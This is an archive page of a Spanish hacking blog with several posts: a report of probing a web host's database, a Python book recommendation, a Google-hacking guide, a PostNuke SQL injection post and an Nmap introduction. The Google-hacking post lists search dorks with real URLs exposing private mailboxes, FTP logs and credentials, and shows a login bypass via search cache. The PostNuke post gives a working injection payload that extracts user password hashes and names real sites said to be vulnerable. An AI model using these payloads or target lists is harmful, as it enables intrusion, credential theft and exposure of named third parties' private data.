Archive for the ‘ Hacking ’ Category

Fallos de seguridad potencialmente explotables en la base de datos de 000Webhost.com!

Esta tarde he intentado registrar un nuevo espacio en 000webhost para utilizar las bases de datos que ofrece, y cuando me iba a registrar( Order now), me daba error, indicio de que algo no iba bien. Trasteando un poco el servidor me devolvió unos errores Warnig en los que se podía ver la estructura del servidor y el login de root ( freehost_root )

 

Ver IMAGEN.

 

E inyectando un poco de código algunos errores más:

 

Ver IMAGEN

 

Por el momento no le he sacado provecho alguno, si alguien consigue algo que postee. Si saco algo en limpio pondré resultados.

Tutorial de Python

Hoy os traigo un libro muy bueno para aprender a programar en python, da igual que nunca programases o que seas un experto en el tema, este, es tu libro :D
El índice consta de estos apartados:
Tipos básicos
Control de flujo
Funciones
Orientación a objetos
Programación funcional
Excepciones
Módulos y paquetes
Entrada / Salida
Expresiones regulares
Sockets
Interacción con webs
Threads

Que la verdad, hasta donde he podido leer está muy muy bien explicado. Así que sin más preámbulos os dejo un link a la web de descarga.
No olvideis que está en Creative Commons por lo tanto podeis copiarlo, modificarlo, traducirlo, etc.
Espero que lo disfruteis ^^

Google Hacking II!

Escribo este artículo debido a la tirada que tubo la “tontería” del post de “Hacking cámaras de seguridad (Lammer) en este mismo blog.

 

Por Google Hacking no entendemos ataques propiamente contra servidores de Google.com, sino que es un hacking de búsqueda, es decir, aprovechando la gran información recopilada por los bots del buscador para indexar las webs, sacar direcciones de urls interesantes, con información delicada, como cuentas de correo electrónico, errores en sistemas de gestión de bases de datos, logs de servidores, archivos confidenciales y con passwords, listado de directorios…

 

Todo esto es tan sencillo como laborioso e imaginativo, pues con unos “comandos”  programados por el buscador con un determinado fin sacarle otro muy distinto.

 

Algunos de los más interesantes y fáciles en cuanto a resultados inmediatos se refiere, son los siguientes:

 

-Acceso a cuentas de e-mail confidenciales sin previo loggin:

 

filetype:mbx mbx intext:Subject

 

Tipo de resultados que devuelve google:

 

IMAGEN 1

 

Algunas de los mails a los que podemos acceder con esas búsquedas:

http://www.nt.ntnu.no/users/skoge/book/mail43917/1996.mbx

http://www.mediaselectah.com/Special/Users/medsel/main.mbx

http://www.mediaselectah.com/Special/Users/contact/Main.mbx?ref=BenimShopum.com

http://www.lovelu.com/backup/Mail/HUBNI.COM/Users/mail/main.mbx

http://www.lovelu.com/backup/Mail/documentabd.com/Users/agalib/Deleted.mbx

 

No nos podemos centrar en el comando filetype:mbx mbx intext:Subject , para lograr resultados interesantes debemos combinar palabras reservadas, por ejemplo añadiendo “Inurl:users” saldrán cosas diferentes, “inurl”: Hotmail.com todavía más, y así un sinfín de posibilidades. Claro que con 5,5, o 10 palabras obtenemos unos resultados interesantes, cuentas de correo en este caso, mails que ni nos van ni nos vienen, pero haciendo que la inputblox de google se nos quede pequeña se consiguen buenos resultados.

 

          Acceso a Logs confidenciales:

 

Por ejemplo por todos es conocido el WS FTP, un cliente freeware muy común. Pues podemos encontrar logs interesantes con la siguiente secuencia:

 

+htpasswd +WS_FTP.LOG filetype:log

 

Devolviéndonos en google algo similar a esto:

 

IMAGEN2

 

Algunos de los logs que podemos consultar:

 

http://www.hermit.com/hermit/vid/michaelmiller/WS_FTP.LOG

 

Son muy útiles para hacernos una idea de la estructura de un servidor que vamos a atacar, o simplemente estudiar. Aunque de primera mano ya nos puede revelar passwords y logias de acceso al Server, es un a búsqueda muy usada, para ver modificaciones en el servidor reservada a privilegios de administrador, saber el sistema sobre el que está montado el servidor(Apache..),direcciones de acceso ftp, localización de archivos .htpasswd…

 

Algunos servidores intentan protegerse sin éxito, por ejemplo esta dirección restringe el acceso mediante identificación login/pass:

http://costumesociety.org.uk/executive/WS_FTP.LOG

 

Pero podemos saltárnosla de una manera tan sencilla como hacer una búsqueda HTML en google, lo cúal nos daría acceso, resultado:

 

http://66.102.9.104/search?q=cache:gy8OSVE19vwJ:costumesociety.org.uk/executive/WS_FTP.LOG+%2Bhtpasswd+%2BWS_FTP.LOG+filetype:log&hl=es&ct=clnk&cd=5&gl=es

 

Y como decía antes, vemos dirección del Server, datos del ftp, login de acceso,localización de los datos en el servidor, e incluso del archvio .htpasswd….

 

-Archivos con passwords:

 

Buscando con cosas del tipo:

 

filetype:bak createobject sa

 

Nos pueden salir cosas tan interesantes como esta:

 

IMAGEN3

 

En esta imagen podemos ver host, user y password de varias bases de datos.

 

Aplicaciones configuradas por defecto:

Las aplicaciones configuradas por defecto, como tales traen los datos de acceso, claves y demás por defecto. Dichas claves son públicas y se encuentran en cualquier página de la red.

 

Para buscar por ejemplo sitios con configuraciones por defecto de IIS, o de Aache Web Server, buscaríamos de la siguiente manera:

 

intitle:”Welcome to IIS

intitle:”Test Page for Apache”

 

Las opciones de búsqueda como en los demás ejemplo pueden ser múltiples y variadas, y además podemos extrapolar para buscar aplicaciones configuradas por defecto todo un abanico de software web.

 

Por ejemplo para Apache también podríamos usar palabras como “It Worked”, lo que yo recomiendo es instalar primero la aplicación en nuestra máquina y luego búscar datos que nos parecieron relevantes y generalizados de la instalación.

 

http://comminfo.uky.edu/

http://ced.nl/

http://www.tanaka.ecc.u-tokyo.ac.jp/

 

Listado de directorios:

 

La definición del título exime de cualquier explicación:

 

intitle:”Index of” -inurl:htm -inurl:html

 

Y como siempre podemos variar según lo que búsquemos:

 

ENCUENTRA MÚSICA: ( lo pongo en grande porque muchos pasaran del leer el tema “hacking” pero les interesa encontrar los mp3, y para que no pase desapercibido.

intitle:”Index of” -inurl:htm -inurl:html mp3

 

Que nos devolvería directorios cargados de música, por ejemplo así encontré yo:

http://indexofmp3.net/

http://www.audiobiblia.org/mp3/

http://www.audiobiblia.org/mp3/20_Proverbios/

http://www.toguapo.com/mp3/

http://www.mp3fusion.net/ftp/

http://www.villacarlospaz.gov.ar/mp3/

http://franceradio.net/mp3/?PHPSESSID=8849e5545bf6a0632d2cafb5c5a221ee

http://www.hardcore.lt/mp3/VRR/

http://www2.b3ta.com/mp3/

 

Bueno es todo, en próximas entregas, más y mejor.

 

Ataque SQL Injection a PostNuke!

 Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

www.exactas.org

www.trabajosocial.unam.mx

www.amigosdelaire.com

www.dentistasrioja.com

www.adolince.net

www.sirzee.itcr.ac.cr

www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

www.lasalle.es ( Mi Ex colegio xD )

www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.

 

 

 

 

 

Nmap! Herramienta básica.

Este programa es básico a la hora de realizar cualquier tarea de análisis de redes/auditoria de seguridad. Inicialmente fue diseñado para analizar redes muy grandes en periodos de tiempo muy cortos, pero desde sus inicios la herramienta se ha convertido en imprescindible a la hora de escanear equipos.

 

Lanzando paquetes desde Nmap podremos averiguar los equipos que se encuentran a la escucha, que servicios ofrecen y comparten, O.S, firewalls…

 

Muchos administradores de red lo utilizan para las tareas más cotidianas, como monitorizaciones de los equipos en tiempo real.

 

Podemos descargar la herramienta de:

 http://nmap.org/ 

Algunos pantallazas de salidas de Nmap:

 

PANTALLA 1

PANTALLA 2